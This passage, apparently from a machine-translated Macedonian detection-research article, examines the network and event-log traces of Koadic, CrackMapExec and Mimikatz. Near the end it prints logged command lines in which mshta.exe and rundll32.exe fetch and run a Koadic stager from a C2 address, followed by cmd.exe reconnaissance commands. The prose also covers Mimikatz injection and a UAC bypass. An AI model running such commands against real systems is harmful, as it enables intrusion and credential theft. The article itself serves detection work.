ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π°. Π‘ΠΎ Ρ†Π΅Π» Π΄Π° сС Π΄ΠΎΠ±ΠΈΡ˜Π°Ρ‚ ΠΏΠΎΡ‚Ρ€Π΅Π±Π½ΠΈΡ‚Π΅ ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈ, ΠΌΠΎΠ΄ΡƒΠ»ΠΎΡ‚ сС ΠΏΠΎΠ²Ρ€Π·ΡƒΠ²Π° со имСнскиот простор rootSecurityCenter2, ΠΏΠΎΡ‚ΠΎΠ° Π³Π΅Π½Π΅Ρ€ΠΈΡ€Π° WQL Π±Π°Ρ€Π°ΡšΠ΅ ΠΈ Π΄ΠΎΠ±ΠΈΠ²Π° ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ€. На сл. Π‘Π»ΠΈΠΊΠ° 9 ја ΠΏΡ€ΠΈΠΊΠ°ΠΆΡƒΠ²Π° содрТината Π½Π° Ρ‚Π°ΠΊΠ²ΠΈΡ‚Π΅ Π±Π°Ρ€Π°ΡšΠ° ΠΈ ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ€ΠΈ. Π’ΠΎ Π½Π°ΡˆΠΈΠΎΡ‚ ΠΏΡ€ΠΈΠΌΠ΅Ρ€, бСшС ΠΏΡ€ΠΎΠ½Π°Ρ˜Π΄Π΅Π½ Windows Defender.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 9. ΠœΡ€Π΅ΠΆΠ½Π° активност Π½Π° ΠΌΠΎΠ΄ΡƒΠ»ΠΎΡ‚ enum_avproducts

ЧСстопати, Ρ€Π΅Π²ΠΈΠ·ΠΈΡ˜Π°Ρ‚Π° Π½Π° WMI (Trace WMI-Activity), Π²ΠΎ Ρ‡ΠΈΠΈ настани ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° Π½Π°Ρ˜Π΄Π΅Ρ‚Π΅ корисни ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ Π·Π° WQL ΠΏΡ€Π°ΡˆΠ°ΡšΠ°, ΠΌΠΎΠΆΠ΅ Π΄Π° Π±ΠΈΠ΄Π΅ ΠΎΠ½Π΅Π²ΠΎΠ·ΠΌΠΎΠΆΠ΅Π½Π°. Но, Π°ΠΊΠΎ Π΅ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΠ΅Π½ΠΎ, Ρ‚ΠΎΠ³Π°Ρˆ Π°ΠΊΠΎ Π΅ ΠΈΠ·Π²Ρ€ΡˆΠ΅Π½Π° скриптата enum_avproducts, ќС сС Π·Π°Ρ‡ΡƒΠ²Π° настан со ID 11. ЌС Π³ΠΎ содрТи ΠΈΠΌΠ΅Ρ‚ΠΎ Π½Π° корисникот кој Π³ΠΎ испратил Π±Π°Ρ€Π°ΡšΠ΅Ρ‚ΠΎ ΠΈ ΠΈΠΌΠ΅Ρ‚ΠΎ Π²ΠΎ имСнскиот простор rootSecurityCenter2.

БСкој ΠΎΠ΄ CME ΠΌΠΎΠ΄ΡƒΠ»ΠΈΡ‚Π΅ имашС свои Π°Ρ€Ρ‚Π΅Ρ„Π°ΠΊΡ‚ΠΈ, Π±ΠΈΠ»ΠΎ Π΄Π° Π΅ Ρ‚ΠΎΠ° спСцифични WQL ΠΏΡ€Π°ΡˆΠ°ΡšΠ° ΠΈΠ»ΠΈ создавањС Π½Π° ΠΎΠ΄Ρ€Π΅Π΄Π΅Π½ Ρ‚ΠΈΠΏ Π½Π° Π·Π°Π΄Π°Ρ‡ΠΈ Π²ΠΎ распорСдувач Π½Π° Π·Π°Π΄Π°Ρ‡ΠΈ со Π·Π°ΠΌΠ°Ρ‚ΡƒΠ²Π°ΡšΠ΅ ΠΈ активност спСцифична Π·Π° Bloodhound Π²ΠΎ LDAP ΠΈ SMB.

ΠšΠžΠΠ”Π˜Πš

ПосСбна карактСристика Π½Π° Koadic Π΅ ΡƒΠΏΠΎΡ‚Ρ€Π΅Π±Π°Ρ‚Π° Π½Π° JavaScript ΠΈ VBScript Ρ‚ΠΎΠ»ΠΊΡƒΠ²Π°Ρ‡ΠΈ Π²Π³Ρ€Π°Π΄Π΅Π½ΠΈ Π²ΠΎ Windows. Π’ΠΎ ΠΎΠ²Π°Π° смисла, Ρ‚ΠΎΡ˜ Π³ΠΎ слСди Ρ‚Ρ€Π΅Π½Π΄ΠΎΡ‚ Π½Π° ТивССњС Π½Π°Π΄Π²ΠΎΡ€ ΠΎΠ΄ Π·Π΅ΠΌΡ˜Π°Ρ‚Π° - односно Π½Π΅ΠΌΠ° Π½Π°Π΄Π²ΠΎΡ€Π΅ΡˆΠ½ΠΈ зависности ΠΈ користи стандардни Π°Π»Π°Ρ‚ΠΊΠΈ Π·Π° Windows. Ова Π΅ Π°Π»Π°Ρ‚ΠΊΠ° Π·Π° цСлосна ΠΊΠΎΠΌΠ°Π½Π΄Π° ΠΈ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π° (CnC), бидСјќи ΠΏΠΎ ΠΈΠ½Ρ„Π΅ΠΊΡ†ΠΈΡ˜Π°Ρ‚Π° Π½Π° ΠΌΠ°ΡˆΠΈΠ½Π°Ρ‚Π° Π΅ инсталиран β€žΠΈΠΌΠΏΠ»Π°Π½Ρ‚β€œ ΡˆΡ‚ΠΎ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΡƒΠ²Π° Π΄Π° сС ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΠΈΡ€Π°. Π’Π°ΠΊΠ²Π°Ρ‚Π° машина, Π²ΠΎ коадската Ρ‚Π΅Ρ€ΠΌΠΈΠ½ΠΎΠ»ΠΎΠ³ΠΈΡ˜Π°, сС Π½Π°Ρ€Π΅ΠΊΡƒΠ²Π° β€žΠ·ΠΎΠΌΠ±ΠΈβ€œ. Π”ΠΎΠΊΠΎΠ»ΠΊΡƒ Π½Π΅ΠΌΠ° Π΄ΠΎΠ²ΠΎΠ»Π½ΠΎ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ Π·Π° цСлосна ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΡ˜Π° ΠΎΠ΄ страната Π½Π° ΠΆΡ€Ρ‚Π²Π°Ρ‚Π°, Koadic ΠΈΠΌΠ° моТност Π΄Π° Π³ΠΈ ΠΏΠΎΠ΄ΠΈΠ³Π½Π΅ ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ Ρ‚Π΅Ρ…Π½ΠΈΠΊΠΈ Π·Π° бајпас Π·Π° ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π° Π½Π° корисничка смСтка (UAC bypass).

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 10. ΠšΠΎΠ°Π΄ΠΈΡ‡Π½Π° школка

Π–Ρ€Ρ‚Π²Π°Ρ‚Π° ΠΌΠΎΡ€Π° Π΄Π° Π·Π°ΠΏΠΎΡ‡Π½Π΅ ΠΊΠΎΠΌΡƒΠ½ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π° со сСрвСрот Command & Control. Π—Π° Π΄Π° Π³ΠΎ Π½Π°ΠΏΡ€Π°Π²ΠΈΡ‚Π΅ ΠΎΠ²Π°, Ρ‚Π°Π° Ρ‚Ρ€Π΅Π±Π° Π΄Π° ΠΊΠΎΠ½Ρ‚Π°ΠΊΡ‚ΠΈΡ€Π° со ΠΏΡ€Π΅Ρ‚Ρ…ΠΎΠ΄Π½ΠΎ ΠΏΠΎΠ΄Π³ΠΎΡ‚Π²Π΅Π½ URI ΠΈ Π΄Π° Π³ΠΎ ΠΏΡ€ΠΈΠΌΠΈ Π³Π»Π°Π²Π½ΠΎΡ‚ΠΎ Ρ‚Π΅Π»ΠΎ Π½Π° Koadic ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ Π΅Π΄Π΅Π½ ΠΎΠ΄ сцСнариститС. На сл. Π‘Π»ΠΈΠΊΠ° 11 ΠΏΠΎΠΊΠ°ΠΆΡƒΠ²Π° ΠΏΡ€ΠΈΠΌΠ΅Ρ€ Π·Π° ΠΌΡˆΡ‚Π° ΡΡ‚Π΅Ρ˜ΡŸΠ΅Ρ€ΠΎΡ‚.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 11. Π˜Π½ΠΈΡ†ΠΈΡ˜Π°Π»ΠΈΠ·ΠΈΡ€Π°ΡšΠ΅ Π½Π° сСсија со CnC сСрвСрот

Π’Ρ€Π· основа Π½Π° ΠΏΡ€ΠΎΠΌΠ΅Π½Π»ΠΈΠ²Π°Ρ‚Π° Π·Π° ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ€ WS, станува јасно Π΄Π΅ΠΊΠ° ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅Ρ‚ΠΎ сС случува ΠΏΡ€Π΅ΠΊΡƒ WScript.Shell, Π° ΠΏΡ€ΠΎΠΌΠ΅Π½Π»ΠΈΠ²ΠΈΡ‚Π΅ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE содрТат ΠΊΠ»ΡƒΡ‡Π½ΠΈ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ Π·Π° ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΈΡ‚Π΅ Π½Π° Ρ‚Π΅ΠΊΠΎΠ²Π½Π°Ρ‚Π° сСсија. Ова Π΅ ΠΏΡ€Π²ΠΈΠΎΡ‚ ΠΏΠ°Ρ€ Π±Π°Ρ€Π°ΡšΠ΅-ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ€ Π²ΠΎ HTTP врска со CnC сСрвСр. ΠŸΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»Π½ΠΈΡ‚Π΅ Π±Π°Ρ€Π°ΡšΠ° сС Π΄ΠΈΡ€Π΅ΠΊΡ‚Π½ΠΎ ΠΏΠΎΠ²Ρ€Π·Π°Π½ΠΈ со функционалноста Π½Π° ΠΏΠΎΠ²ΠΈΠΊΠ°Π½ΠΈΡ‚Π΅ ΠΌΠΎΠ΄ΡƒΠ»ΠΈ (ΠΈΠΌΠΏΠ»Π°Π½Ρ‚ΠΈΡ‚Π΅). Π‘ΠΈΡ‚Π΅ Koadic ΠΌΠΎΠ΄ΡƒΠ»ΠΈ Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ само со Π°ΠΊΡ‚ΠΈΠ²Π½Π° сСсија со CnC.

Mimikatz

Π˜ΡΡ‚ΠΎ ΠΊΠ°ΠΊΠΎ ΡˆΡ‚ΠΎ CME Ρ€Π°Π±ΠΎΡ‚ΠΈ со Bloodhound, Koadic Ρ€Π°Π±ΠΎΡ‚ΠΈ со Mimikatz ΠΊΠ°ΠΊΠΎ посСбна ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠ° ΠΈ ΠΈΠΌΠ° повСќС Π½Π°Ρ‡ΠΈΠ½ΠΈ Π΄Π° ја стартува. ΠŸΠΎΠ΄ΠΎΠ»Ρƒ Π΅ ΠΏΠ°Ρ€ΠΎΡ‚ Π±Π°Ρ€Π°ΡšΠ΅-ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ€ Π·Π° ΠΏΡ€Π΅Π·Π΅ΠΌΠ°ΡšΠ΅ Π½Π° ΠΈΠΌΠΏΠ»Π°Π½Ρ‚ΠΎΡ‚ Mimikatz.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 12. ВрансфСр Π½Π° ΠœΠΈΠΌΠΈΠΊΠ°Ρ‚Ρ† Π²ΠΎ Коадиќ

ΠœΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° Π²ΠΈΠ΄ΠΈΡ‚Π΅ ΠΊΠ°ΠΊΠΎ сС ΠΏΡ€ΠΎΠΌΠ΅Π½ΠΈ Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΎΡ‚ URI Π²ΠΎ Π±Π°Ρ€Π°ΡšΠ΅Ρ‚ΠΎ. Π‘Π΅Π³Π° содрТи врСдност Π·Π° ΠΏΡ€ΠΎΠΌΠ΅Π½Π»ΠΈΠ²Π°Ρ‚Π° csrf, која Π΅ ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ€Π½Π° Π·Π° ΠΈΠ·Π±Ρ€Π°Π½ΠΈΠΎΡ‚ ΠΌΠΎΠ΄ΡƒΠ». НС ΠΎΠ±Ρ€Π½ΡƒΠ²Π°Ρ˜Ρ‚Π΅ Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ Π½Π° Π½Π΅Ρ˜Π·ΠΈΠ½ΠΎΡ‚ΠΎ ΠΈΠΌΠ΅; Π‘ΠΈΡ‚Π΅ Π·Π½Π°Π΅ΠΌΠ΅ Π΄Π΅ΠΊΠ° CSRF ΠΎΠ±ΠΈΡ‡Π½ΠΎ сС Ρ€Π°Π·Π±ΠΈΡ€Π° ΠΏΠΎΠΈΠ½Π°ΠΊΡƒ. ΠžΠ΄Π³ΠΎΠ²ΠΎΡ€ΠΎΡ‚ бСшС истото Π³Π»Π°Π²Π½ΠΎ Ρ‚Π΅Π»ΠΎ Π½Π° Коадиќ, Π½Π° ΠΊΠΎΠ΅ бСшС Π΄ΠΎΠ΄Π°Π΄Π΅Π½ ΠΊΠΎΠ΄ ΠΏΠΎΠ²Ρ€Π·Π°Π½ со ΠœΠΈΠΌΠΈΠΊΠ°Ρ†. Вој Π΅ доста Π³ΠΎΠ»Π΅ΠΌ, ΠΏΠ° Π΄Π° Π³ΠΈ ΠΏΠΎΠ³Π»Π΅Π΄Π½Π΅ΠΌΠ΅ ΠΊΠ»ΡƒΡ‡Π½ΠΈΡ‚Π΅ Ρ‚ΠΎΡ‡ΠΊΠΈ. ОвдС ја ΠΈΠΌΠ°ΠΌΠ΅ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ°Ρ‚Π° Mimikatz ΠΊΠΎΠ΄ΠΈΡ€Π°Π½Π° Π²ΠΎ base64, сСриска .NET класа која ќС ја ΠΈΠ½Ρ˜Π΅ΠΊΡ‚ΠΈΡ€Π° ΠΈ Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ΠΈ Π·Π° Π»Π°Π½ΡΠΈΡ€Π°ΡšΠ΅ Π½Π° Mimikatz. Π Π΅Π·ΡƒΠ»Ρ‚Π°Ρ‚ΠΎΡ‚ ΠΎΠ΄ ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅Ρ‚ΠΎ сС прСнСсува ΠΏΡ€Π΅ΠΊΡƒ ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π° Π²ΠΎ јасСн тСкст.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 13. Π Π΅Π·ΡƒΠ»Ρ‚Π°Ρ‚ ΠΎΠ΄ ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ Π½Π° Mimikatz Π½Π° далСчинска машина

Exec_cmd

Koadic ΠΈΠΌΠ° ΠΈ ΠΌΠΎΠ΄ΡƒΠ»ΠΈ ΠΊΠΎΠΈ ΠΌΠΎΠΆΠ°Ρ‚ Π΄Π° ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°Π°Ρ‚ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ ΠΎΠ΄ Π΄Π°Π»Π΅Ρ‡ΠΈΠ½Π°. ОвдС ќС Π³ΠΎ Π²ΠΈΠ΄ΠΈΠΌΠ΅ истиот ΠΌΠ΅Ρ‚ΠΎΠ΄ Π·Π° Π³Π΅Π½Π΅Ρ€ΠΈΡ€Π°ΡšΠ΅ URI ΠΈ ΠΏΠΎΠ·Π½Π°Ρ‚ΠΈΡ‚Π΅ sid ΠΈ csrf ΠΏΡ€ΠΎΠΌΠ΅Π½Π»ΠΈΠ²ΠΈ. Π’ΠΎ ΡΠ»ΡƒΡ‡Π°Ρ˜ΠΎΡ‚ Π½Π° ΠΌΠΎΠ΄ΡƒΠ»ΠΎΡ‚ exec_cmd, ΠΊΠΎΠ΄ΠΎΡ‚ сС Π΄ΠΎΠ΄Π°Π²Π° Π½Π° Ρ‚Π΅Π»ΠΎΡ‚ΠΎ ΡˆΡ‚ΠΎ Π΅ способно Π΄Π° ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ Π½Π° школка. ΠŸΠΎΠ΄ΠΎΠ»Ρƒ Π΅ ΠΏΡ€ΠΈΠΊΠ°ΠΆΠ°Π½ Ρ‚Π°ΠΊΠΎΠ² ΠΊΠΎΠ΄ содрТан Π²ΠΎ HTTP ΠΎΠ΄Π³ΠΎΠ²ΠΎΡ€ΠΎΡ‚ Π½Π° CnC сСрвСрот.

Како Π΄Π° ΠΎΡ‚ΠΊΡ€ΠΈΠ΅Ρ‚Π΅ Π½Π°ΠΏΠ°Π΄ΠΈ Π½Π° инфраструктурата Π½Π° Windows: ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° хакСрски Π°Π»Π°Ρ‚ΠΊΠΈ
ΠžΡ€ΠΈΠ·. 14. Код Π½Π° ΠΈΠΌΠΏΠ»Π°Π½Ρ‚ exec_cmd

ΠŸΡ€ΠΎΠΌΠ΅Π½Π»ΠΈΠ²Π°Ρ‚Π° GAWTUUGCFI со ΠΏΠΎΠ·Π½Π°Ρ‚ΠΈΠΎΡ‚ Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ WS Π΅ ΠΏΠΎΡ‚Ρ€Π΅Π±Π½Π° Π·Π° ΠΈΠ·Π²Ρ€ΡˆΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΊΠΎΠ΄ΠΎΡ‚. Π‘ΠΎ Π½Π΅Π³ΠΎΠ²Π° помош, ΠΈΠΌΠΏΠ»Π°Π½Ρ‚ΠΎΡ‚ ја ΠΏΠΎΠ²ΠΈΠΊΡƒΠ²Π° ΡˆΠΊΠΎΠ»ΠΊΠ°Ρ‚Π°, ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΡƒΠ²Π°Ρ˜ΡœΠΈ Π΄Π²Π΅ Π³Ρ€Π°Π½ΠΊΠΈ Π½Π° ΠΊΠΎΠ΄ - shell.exec со Π²Ρ€Π°ΡœΠ°ΡšΠ΅ Π½Π° ΠΈΠ·Π»Π΅Π·Π½ΠΈΠΎΡ‚ ΠΏΠΎΡ‚ΠΎΠΊ Π½Π° ΠΏΠΎΠ΄Π°Ρ‚ΠΎΡ†ΠΈ ΠΈ shell.run Π±Π΅Π· Π²Ρ€Π°ΡœΠ°ΡšΠ΅.

Koadic Π½Π΅ Π΅ Ρ‚ΠΈΠΏΠΈΡ‡Π½Π° Π°Π»Π°Ρ‚ΠΊΠ°, Π½ΠΎ ΠΈΠΌΠ° свои Π°Ρ€Ρ‚Π΅Ρ„Π°ΠΊΡ‚ΠΈ со ΠΊΠΎΠΈ ΠΌΠΎΠΆΠ΅ Π΄Π° сС најдС Π²ΠΎ Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ΅Π½ ΡΠΎΠΎΠ±Ρ€Π°ΡœΠ°Ρ˜:

  • ΡΠΏΠ΅Ρ†ΠΈΡ˜Π°Π»Π½ΠΎ Ρ„ΠΎΡ€ΠΌΠΈΡ€Π°ΡšΠ΅ Π½Π° HTTP Π±Π°Ρ€Π°ΡšΠ°,
  • ΠΊΠΎΡ€ΠΈΡΡ‚Π΅Ρ˜ΡœΠΈ winHttpRequests API,
  • создавањС Π½Π° ΠΎΠ±Ρ˜Π΅ΠΊΡ‚ WScript.Shell ΠΏΡ€Π΅ΠΊΡƒ ActiveXObject,
  • Π³ΠΎΠ»Π΅ΠΌΠΎ ΠΈΠ·Π²Ρ€ΡˆΠ½ΠΎ Ρ‚Π΅Π»ΠΎ.

ΠŸΠΎΡ‡Π΅Ρ‚Π½Π°Ρ‚Π° врска Π΅ ΠΈΠ½ΠΈΡ†ΠΈΡ€Π°Π½Π° ΠΎΠ΄ ΡΡ‚Π΅Ρ˜ΡŸΠ΅Ρ€ΠΎΡ‚, Ρ‚Π°ΠΊΠ° ΡˆΡ‚ΠΎ Π΅ ΠΌΠΎΠΆΠ½ΠΎ Π΄Π° сС ΠΎΡ‚ΠΊΡ€ΠΈΠ΅ Π½Π΅Π³ΠΎΠ²Π°Ρ‚Π° активност ΠΏΡ€Π΅ΠΊΡƒ настани Π½Π° Windows. Π—Π° mshta, ΠΎΠ²Π° Π΅ настан 4688, ΡˆΡ‚ΠΎ ΡƒΠΊΠ°ΠΆΡƒΠ²Π° Π½Π° создавањС процСс со Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ Π·Π° ΠΏΠΎΡ‡Π΅Ρ‚ΠΎΠΊ:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Π”ΠΎΠ΄Π΅ΠΊΠ° Ρ€Π°Π±ΠΎΡ‚ΠΈ Koadic, ΠΌΠΎΠΆΠ΅Ρ‚Π΅ Π΄Π° Π²ΠΈΠ΄ΠΈΡ‚Π΅ Π΄Ρ€ΡƒΠ³ΠΈ 4688 настани со Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ΠΈ ΠΊΠΎΠΈ ΡΠΎΠ²Ρ€ΡˆΠ΅Π½ΠΎ Π³ΠΎ ΠΊΠ°Ρ€Π°ΠΊΡ‚Π΅Ρ€ΠΈΠ·ΠΈΡ€Π°Π°Ρ‚:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Наоди

Π’Ρ€Π΅Π½Π΄ΠΎΡ‚ Π·Π° ТивССњС ΠΎΠ΄ Π·Π΅ΠΌΡ˜ΠΈΡˆΡ‚Π΅Ρ‚ΠΎ сС Π·Π΄ΠΎΠ±ΠΈΠ²Π° со популарност ΠΌΠ΅Ρ“Ρƒ ΠΊΡ€ΠΈΠΌΠΈΠ½Π°Π»Ρ†ΠΈΡ‚Π΅. Π’ΠΈΠ΅ Π³ΠΈ користат Π°Π»Π°Ρ‚ΠΊΠΈΡ‚Π΅ ΠΈ ΠΌΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΠΈΡ‚Π΅ Π²Π³Ρ€Π°Π΄Π΅Π½ΠΈ Π²ΠΎ Windows Π·Π° Π½ΠΈΠ²Π½ΠΈΡ‚Π΅ ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈ. Π“Π»Π΅Π΄Π°ΠΌΠ΅ ΠΏΠΎΠΏΡƒΠ»Π°Ρ€Π½ΠΈ Π°Π»Π°Ρ‚ΠΊΠΈ Koadic, CrackMapExec ΠΈ Impacket ΠΊΠΎΠΈ Π³ΠΎ слСдат овој ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏ сè почСсто сС ΠΏΠΎΡ˜Π°Π²ΡƒΠ²Π°Π°Ρ‚ Π²ΠΎ ΠΈΠ·Π²Π΅ΡˆΡ‚Π°ΠΈΡ‚Π΅ Π½Π° APT. РастС ΠΈ Π±Ρ€ΠΎΡ˜ΠΎΡ‚ Π½Π° Π²ΠΈΠ»ΡƒΡˆΠΊΠΈ Π½Π° GitHub Π·Π° ΠΎΠ²ΠΈΠ΅ Π°Π»Π°Ρ‚ΠΊΠΈ, Π° сС ΠΏΠΎΡ˜Π°Π²ΡƒΠ²Π°Π°Ρ‚ ΠΈ Π½ΠΎΠ²ΠΈ (сСга вСќС Π³ΠΈ ΠΈΠΌΠ° ΠΎΠΊΠΎΠ»Ρƒ илјада). Π’Ρ€Π΅Π½Π΄ΠΎΡ‚ Π΄ΠΎΠ±ΠΈΠ²Π° Π½Π° популарност ΠΏΠΎΡ€Π°Π΄ΠΈ Π½Π΅Π³ΠΎΠ²Π°Ρ‚Π° Сдноставност: Π½Π° Π½Π°ΠΏΠ°Ρ“Π°Ρ‡ΠΈΡ‚Π΅ Π½Π΅ ΠΈΠΌ сС ΠΏΠΎΡ‚Ρ€Π΅Π±Π½ΠΈ Π°Π»Π°Ρ‚ΠΊΠΈ ΠΎΠ΄ Ρ‚Ρ€Π΅Ρ‚ΠΈ страни; Ρ‚ΠΈΠ΅ вСќС сС Π½Π° ΠΌΠ°ΡˆΠΈΠ½ΠΈΡ‚Π΅ Π½Π° ΠΆΡ€Ρ‚Π²ΠΈΡ‚Π΅ ΠΈ ΠΈΠΌ ΠΏΠΎΠΌΠ°Π³Π°Π°Ρ‚ Π΄Π° Π³ΠΈ Π·Π°ΠΎΠ±ΠΈΠΊΠΎΠ»Π°Ρ‚ бСзбСдноснитС ΠΌΠ΅Ρ€ΠΊΠΈ. Π‘Π΅ фокусирамС Π½Π° ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° ΠΌΡ€Π΅ΠΆΠ½Π°Ρ‚Π° ΠΊΠΎΠΌΡƒΠ½ΠΈΠΊΠ°Ρ†ΠΈΡ˜Π°: сСкоја Π°Π»Π°Ρ‚ΠΊΠ° опишана ΠΏΠΎΠ³ΠΎΡ€Π΅ остава свои Ρ‚Ρ€Π°Π³ΠΈ Π²ΠΎ ΠΌΡ€Π΅ΠΆΠ½ΠΈΠΎΡ‚ ΡΠΎΠΎΠ±Ρ€Π°ΡœΠ°Ρ˜; Π΄Π΅Ρ‚Π°Π»Π½ΠΎΡ‚ΠΎ ΠΏΡ€ΠΎΡƒΡ‡ΡƒΠ²Π°ΡšΠ΅ Π½Π° Π½ΠΈΠ² Π½ΠΈ ΠΎΠ²ΠΎΠ·ΠΌΠΎΠΆΠΈ Π΄Π° Π³ΠΎ Π½Π°ΡƒΡ‡ΠΈΠΌΠ΅ Π½Π°ΡˆΠΈΠΎΡ‚ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ ΠžΡ‚ΠΊΡ€ΠΈΠ²Π°ΡšΠ΅ Π½Π° ΠΌΡ€Π΅ΠΆΠ΅Π½ Π½Π°ΠΏΠ°Π΄ Π½Π° PT Π΄Π΅Ρ‚Π΅ΠΊΡ‚ΠΈΡ€Π°Ρ˜Ρ‚Π΅ Π³ΠΈ, ΡˆΡ‚ΠΎ Π½Π° ΠΊΡ€Π°Ρ˜ΠΎΡ‚ ΠΏΠΎΠΌΠ°Π³Π° Π΄Π° сС истраТи Ρ†Π΅Π»ΠΈΠΎΡ‚ ΡΠΈΠ½ΡŸΠΈΡ€ Π½Π° ΡΠ°Ρ˜Π±Π΅Ρ€ ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚ΠΈ ΠΊΠΎΠΈ Π³ΠΈ Π²ΠΊΠ»ΡƒΡ‡ΡƒΠ²Π°Π°Ρ‚.

Автори:

  • Антон Π’Ρ˜ΡƒΡ€ΠΈΠ½, Ρ€Π°ΠΊΠΎΠ²ΠΎΠ΄ΠΈΡ‚Π΅Π» Π½Π° ΠžΠ΄Π΄Π΅Π»ΠΎΡ‚ Π·Π° СкспСртски услуги, ЕкспСртски бСзбСдносСн Ρ†Π΅Π½Ρ‚Π°Ρ€ Π½Π° ПВ, ΠŸΠΎΠ·ΠΈΡ‚ΠΈΠ²Π½ΠΈ Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ
